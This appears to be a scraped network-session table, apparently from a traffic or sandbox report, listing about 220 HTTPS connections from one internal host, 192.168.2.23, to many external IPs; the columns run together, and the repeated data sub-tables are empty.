                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23669192.168.2.235065872.82.165.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23670192.168.2.2349046150.129.61.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23671192.168.2.2334172138.44.176.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23672192.168.2.235797445.217.72.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23673192.168.2.2334874107.151.149.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23674192.168.2.2336318193.130.129.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23675192.168.2.2347644132.240.31.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23676192.168.2.2345412222.33.247.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23677192.168.2.234552877.240.17.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23678192.168.2.2355080190.149.153.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23679192.168.2.2333922148.152.201.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23680192.168.2.23589784.49.162.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23681192.168.2.234946099.40.63.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23682192.168.2.2355356136.114.135.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23683192.168.2.2342374125.187.167.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23684192.168.2.2347408141.190.149.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23685192.168.2.2356052199.25.198.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23686192.168.2.2359308201.153.90.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23687192.168.2.2333106103.106.220.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23688192.168.2.235484049.166.49.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23689192.168.2.234866035.157.254.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23690192.168.2.234459053.236.172.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23691192.168.2.2345258171.150.53.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23692192.168.2.2347882102.27.48.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23693192.168.2.2359884200.194.24.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23694192.168.2.2349402182.39.76.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23695192.168.2.2334344194.210.220.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23696192.168.2.234676447.126.41.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23697192.168.2.235462812.139.170.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23698192.168.2.2349352159.219.8.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23699192.168.2.235400454.110.189.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23700192.168.2.235012870.74.232.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23701192.168.2.2343658218.16.66.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23702192.168.2.233416644.115.94.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23703192.168.2.2345466149.230.129.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23704192.168.2.235869824.15.60.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23705192.168.2.2352230140.122.240.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23706192.168.2.235941412.180.119.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23707192.168.2.235526899.105.72.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23708192.168.2.2332774219.49.164.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23709192.168.2.2345418223.180.63.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23710192.168.2.2357358189.241.237.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23711192.168.2.2343430183.158.195.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23712192.168.2.2347716155.107.106.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23713192.168.2.234671252.41.24.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23714192.168.2.235608245.193.251.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23715192.168.2.234830092.40.54.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23716192.168.2.235421043.134.147.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23717192.168.2.2347984163.216.42.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23718192.168.2.235209642.141.188.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23719192.168.2.235720443.116.10.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23720192.168.2.2358288128.211.65.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23721192.168.2.2359488191.226.191.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23722192.168.2.2345754157.160.238.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23723192.168.2.235833836.18.155.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23724192.168.2.2335882184.134.145.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23725192.168.2.2343868180.132.147.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23726192.168.2.2334180116.104.94.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23727192.168.2.2340468166.39.139.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23728192.168.2.2351246146.37.0.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23729192.168.2.234671866.189.239.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23730192.168.2.233398240.205.160.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23731192.168.2.234969437.167.94.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23732192.168.2.234315050.241.211.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23733192.168.2.233586899.241.97.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23734192.168.2.2352060207.97.66.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23735192.168.2.2357168152.212.31.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23736192.168.2.233596486.166.197.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23737192.168.2.2344810199.45.103.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23738192.168.2.234859896.224.46.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23739192.168.2.233681861.55.212.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23740192.168.2.234134878.54.233.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23741192.168.2.2346894106.218.168.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23742192.168.2.233626895.86.120.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23743192.168.2.2353752114.170.75.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23744192.168.2.23471581.53.65.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23745192.168.2.2338152144.3.138.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23746192.168.2.233316657.244.171.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23747192.168.2.235220224.86.204.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23748192.168.2.2351168200.7.63.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23749192.168.2.2344620204.49.192.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23750192.168.2.235558857.173.56.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23751192.168.2.235200080.250.65.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23752192.168.2.235338683.72.112.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23753192.168.2.235034089.117.0.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23754192.168.2.2337374105.122.158.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23755192.168.2.2339050211.142.40.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23756192.168.2.2359604167.33.17.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23757192.168.2.2349336100.210.9.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23758192.168.2.235720250.84.210.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23759192.168.2.2341460108.30.35.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23760192.168.2.2344558207.194.146.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23761192.168.2.2336586180.55.78.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23762192.168.2.2336444109.191.157.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23763192.168.2.2337792140.222.87.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23764192.168.2.234587037.207.20.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23765192.168.2.2345480186.105.137.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23766192.168.2.2350928145.118.73.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23767192.168.2.2342590190.122.61.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23768192.168.2.2337772126.43.241.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23769192.168.2.2343650178.163.92.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23770192.168.2.235016090.134.230.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23771192.168.2.2335444104.247.38.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23772192.168.2.2351248103.86.111.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23773192.168.2.233789088.33.3.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23774192.168.2.234660034.159.224.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23775192.168.2.2347268173.125.28.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23776192.168.2.2359246180.212.207.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23777192.168.2.2355996144.67.223.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23778192.168.2.2359708119.65.222.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23779192.168.2.234181217.127.49.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23780192.168.2.234841219.212.238.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23781192.168.2.2333570166.241.170.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23782192.168.2.2337718137.198.4.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23783192.168.2.234135075.202.136.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23784192.168.2.234891265.202.32.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23785192.168.2.235536843.195.90.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23786192.168.2.2357442125.84.187.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23787192.168.2.23461042.170.242.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23788192.168.2.2354086174.120.109.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23789192.168.2.235618648.144.179.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23790192.168.2.2346084119.215.198.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23791192.168.2.235382459.172.197.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23792192.168.2.234878846.155.145.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23793192.168.2.2356746169.148.234.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23794192.168.2.2346386207.122.159.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23795192.168.2.2350854149.102.231.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23796192.168.2.23390585.150.76.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23797192.168.2.233780868.246.13.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23798192.168.2.2340838109.190.65.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23799192.168.2.2339020192.69.226.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23800192.168.2.233346639.56.6.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23801192.168.2.2336302119.196.34.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23802192.168.2.233759277.52.77.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23803192.168.2.2357368148.15.68.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23804192.168.2.2340476154.236.193.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23805192.168.2.235694674.111.168.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23806192.168.2.2338352102.117.248.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23807192.168.2.2355374209.15.246.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23808192.168.2.235063667.43.200.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23809192.168.2.2360596133.66.197.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23810192.168.2.2342610182.52.209.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23811192.168.2.2350560194.102.179.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23812192.168.2.2334482207.120.110.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23813192.168.2.2355646201.89.118.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23814192.168.2.2360014156.254.2.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23815192.168.2.2347004124.233.41.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23816192.168.2.2352436197.209.35.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23817192.168.2.2333400187.170.236.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23818192.168.2.235020685.58.228.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23819192.168.2.2338226103.170.237.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23820192.168.2.235894018.250.15.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23821192.168.2.2358592149.239.34.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23822192.168.2.23557029.133.160.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23823192.168.2.2339068195.184.123.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23824192.168.2.2354496158.211.126.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23825192.168.2.234613687.205.215.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23826192.168.2.233994846.68.108.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23827192.168.2.235974435.29.219.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23828192.168.2.2336114146.37.238.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23829192.168.2.2355890191.136.20.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23830192.168.2.2347370137.54.106.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23831192.168.2.2344796206.72.132.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23832192.168.2.2337134207.6.120.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23833192.168.2.2340228171.225.144.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23834192.168.2.2358824123.146.27.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23835192.168.2.234514039.245.153.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23836192.168.2.2339604223.209.14.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23837192.168.2.2335372119.145.207.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23838192.168.2.2340574201.160.199.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23839192.168.2.2357298148.37.138.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23840192.168.2.2340670197.255.193.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23841192.168.2.234689412.205.248.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23842192.168.2.2349852133.217.243.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23843192.168.2.2346032189.85.127.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23844192.168.2.234900441.248.51.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23845192.168.2.2341992125.220.145.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23846192.168.2.2350182177.92.10.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23847192.168.2.2348322177.16.168.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23848192.168.2.2353554197.161.201.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23849192.168.2.2344960115.198.112.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23850192.168.2.2356070206.201.254.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23851192.168.2.234917813.177.152.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23852192.168.2.2348302190.224.191.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23853192.168.2.2348424152.141.3.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23854192.168.2.233843860.52.189.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23855192.168.2.234933445.45.169.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23856192.168.2.233621097.195.3.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23857192.168.2.2359304108.231.1.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23858192.168.2.235145848.86.30.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23859192.168.2.2360754139.71.86.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23860192.168.2.2336398211.103.221.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23861192.168.2.2338462133.105.148.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23862192.168.2.235331439.193.237.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23863192.168.2.2349206201.233.169.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23864192.168.2.234108866.94.158.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23865192.168.2.2360712151.20.16.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23866192.168.2.233760263.246.183.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23867192.168.2.2338944170.224.68.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23868192.168.2.233572268.168.153.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23869192.168.2.2333296179.8.93.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23870192.168.2.234261254.26.52.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23871192.168.2.234169083.146.37.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23872192.168.2.235756059.61.180.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23873192.168.2.233734466.145.189.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23874192.168.2.2354308197.148.34.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23875192.168.2.2333522203.97.169.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23876192.168.2.2335660223.219.15.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23877192.168.2.2347312170.93.74.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23878192.168.2.2334772145.206.97.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23879192.168.2.2342764119.213.221.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23880192.168.2.2349134128.15.69.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23881192.168.2.2359496107.119.35.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23882192.168.2.235640047.144.69.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23883192.168.2.2351556157.176.180.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23884192.168.2.233559280.230.101.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23885192.168.2.235496034.178.141.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23886192.168.2.234585684.116.70.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23887192.168.2.2342424221.67.235.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23888192.168.2.2349840206.196.140.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23889192.168.2.2340376165.156.139.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
